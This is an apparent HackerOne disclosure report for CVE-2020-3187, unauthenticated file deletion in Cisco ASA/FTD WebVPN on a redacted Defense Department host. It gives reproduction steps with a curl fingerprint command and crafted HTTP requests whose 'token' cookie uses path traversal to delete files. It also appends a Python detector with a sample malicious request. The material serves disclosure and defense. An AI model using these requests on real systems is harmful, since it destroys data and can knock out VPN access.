HackerOne report H1:1026265 (emad777)
History: Nov 04, 2020 - 10:22 p.m.

U.S. Dept Of Defense: Unauthenticated Arbitrary File Deletion "CVE-2020-3187" in █████

2020-11-04 22:22:37 | emad777 | hackerone.com | 367

**CVSS3: 9.1 High** (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N`)

| Metric | Value |
|---|---|
| Attack Vector | NETWORK |
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | NONE |
| Scope | UNCHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | HIGH |
| Availability Impact | NONE |

**CVSS2: 7.5 High** (`AV:N/AC:L/Au:N/C:P/I:P/A:P`)

| Metric | Value |
|---|---|
| Access Vector | NETWORK |
| Access Complexity | LOW |
| Authentication | NONE |
| Confidentiality Impact | PARTIAL |
| Integrity Impact | PARTIAL |
| Availability Impact | PARTIAL |

**EPSS: 0.974 High** (Percentile: 99.9%)

Summary:

A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.

Description:

Vulnerable host:
██████████

Impact

An exploit could allow the attacker to view or delete arbitrary files on the system.

Step-by-step Reproduction Instructions

1. Identify a vulnerable host by sending a request to /+CSCOE+/session_password.html.

```sh
curl -skiL "███/+CSCOE+/session_password.html"
```

```http
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
```

If the target is vulnerable, the response will contain a `webvpn` header. The request gave me the following response:

```http
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:40:44 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
```

2. Perform the exploit to delete files by adding a `token` value in the Cookie header of the request.

For example, I wanted to delete this (██████/+CSCOU+/csco_logo.gif) file.
That did not work, because sometimes logo.gif/png has permission issues, so try this: "█████/+CSCOE+/blank.html"

You can also delete the file "/+CSCOE+/blank.html" (an empty HTML file). There might be a problem with the permissions of the custom logo file; sometimes logo.gif has permission issues, so we might not be able to delete it, but we can delete other files.

Request:

```http
Host: ██████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
```

Response:

```http
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:54:48 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 13
<HTML></HTML>
```


**3. So I exploited the CVE and deleted the blank file, as follows:**

Request:

```http
GET /+CSCOE+/session_password.html HTTP/1.1
Host: █████████
Cookie: token=…/+CSCOE+/blank.html
User-Agent: curl/7.47.0
Accept: */*
```


Response:

```http
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:55:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
```


File deleted successfully:

```sh
curl -Ik ████/+CSCOE+/blank.html
```

```http
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Wed, 04 Nov 2020 21:55:08 GMT
X-Frame-Options: SAMEORIGIN

File not found
```


Warning: This can lead to a denial of service (DoS) on the VPN by deleting the Lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.

## Suggested Mitigation/Remediation Actions

Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43
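Besides upgrading, defenders can watch for the request pattern the report describes: a request to a `/+CSCOE+/` page whose Cookie header carries a `token` value that names a WebVPN file path or contains a path-traversal sequence. The following detection helper is an added example written for this page; it is not code from the report author or from Cisco. The cookie name `token` and the `+CSCOE+`/`+CSCOU+` prefixes come from the report; the host `vpn.example.test`, the sample requests and the sample token value are constructed for the demonstration.

```python
"""Detection helper for CVE-2020-3187 exploitation attempts against Cisco ASA/FTD WebVPN.

Added example for this page, not code from the report author or from Cisco.
It inspects raw HTTP requests (for example replayed from a proxy log or a
packet capture) for the pattern the report describes: a request to a
/+CSCOE+/ page whose Cookie header carries a `token` value that points at a
WebVPN file or contains a path-traversal sequence. Samples are constructed.
"""
import re
from dataclasses import dataclass

# WebVPN path prefixes named in the report.
WEBVPN_PREFIXES = ("/+CSCOE+/", "/+CSCOU+/")

# Traversal markers: raw "../", "..\" and common URL-encoded variants.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]|%2e%2e|\.\.%2f|\.\.%5c", re.IGNORECASE)


@dataclass
class Finding:
    reason: str
    path: str
    token: str


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers); header names are lower-cased."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookies(cookie_header: str) -> dict:
    """Parse 'a=1; b=2' into a dict; fragments without '=' are ignored."""
    cookies = {}
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def inspect_request(raw: str) -> list:
    """Return Findings for one request; an empty list means nothing suspicious."""
    _method, path, headers = parse_request(raw)
    if not path.startswith(WEBVPN_PREFIXES):
        return []
    token = parse_cookies(headers.get("cookie", "")).get("token")
    if token is None:
        return []  # ordinary WebVPN cookies (webvpnlogin, webvpnLang) are not flagged
    findings = []
    if TRAVERSAL_RE.search(token):
        findings.append(Finding("traversal sequence in token cookie", path, token))
    if any(prefix in token for prefix in WEBVPN_PREFIXES):
        findings.append(Finding("WebVPN file path in token cookie", path, token))
    return findings


def scan(requests) -> list:
    """Run inspect_request over an iterable of raw requests and collect every Finding."""
    return [f for raw in requests for f in inspect_request(raw)]


# Constructed samples: the first mirrors the report's benign fingerprint request,
# the second carries a constructed token cookie of the shape the report describes.
SAMPLE_BENIGN = """GET /+CSCOE+/session_password.html HTTP/1.1
Host: vpn.example.test
Cookie: webvpnlogin=1; webvpnLang=en
"""

SAMPLE_SUSPICIOUS = """GET /+CSCOE+/session_password.html HTTP/1.1
Host: vpn.example.test
Cookie: token=../../+CSCOE+/blank.html
User-Agent: curl/7.47.0
"""

if __name__ == "__main__":
    for finding in scan([SAMPLE_BENIGN, SAMPLE_SUSPICIOUS]):
        print(f"ALERT {finding.reason}: {finding.path} token={finding.token!r}")
```

The benign fingerprint request carries only the normal `webvpnlogin`/`webvpnLang` cookies and produces no finding, so the rule keys on the presence and content of the `token` cookie rather than on the `/+CSCOE+/` path alone. A match from the constructed suspicious sample is the signal to check the affected files (the report's `curl -Ik …/+CSCOE+/blank.html` returning 404 is the symptom) and to confirm the ASA/FTD version against the advisory.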

## Impact

*High - This vulnerability allows the attacker to delete files within the web services file system.*
